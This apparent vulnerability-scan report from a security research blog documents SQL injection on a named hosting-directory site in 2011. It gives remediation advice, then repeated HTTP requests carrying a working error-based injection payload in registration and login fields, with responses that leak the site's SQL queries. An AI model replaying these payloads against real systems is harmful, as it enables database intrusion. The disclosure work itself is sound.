XSS, Cross Site Scripting in www.hostingcatalog.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY
Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.
XSS.CX Home |
XSS.CX Research Blog
Loading
Netsparker - Scan Report Summary
TARGET URL
http://www.hostingcatalog.com/banner.php?id=3...
SCAN DATE
4/24/2011 6:56:40 AM
REPORT DATE
4/24/2011 10:37:37 AM
SCAN DURATION
02:25:02
Total Requests
Average Speed
req/sec.
167
identified
147
confirmed
29
critical
5
informational
GHDB, DORK Tests
GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Vulnerabilities
VULNERABILITY SUMMARY
Vulnerability Summary
SQL Injection
SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker
confirmed the vulnerability by executing a test SQL Query on the back-end database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping ). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries )
Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements ). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 767 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 748 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
B1
POST
Login
form_field
POST
1
password
POST
3
remember_both
POST
1
remember_mail
POST
1
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 364 Accept-Encoding: gzip, deflate B1=Login&form_field=1&password=3&remember_both=1&remember_mail=1&temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:58:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 728 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:16:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 709 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:18:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 745 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:37:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 726 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:39:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 730 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:58:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 711 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:00:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
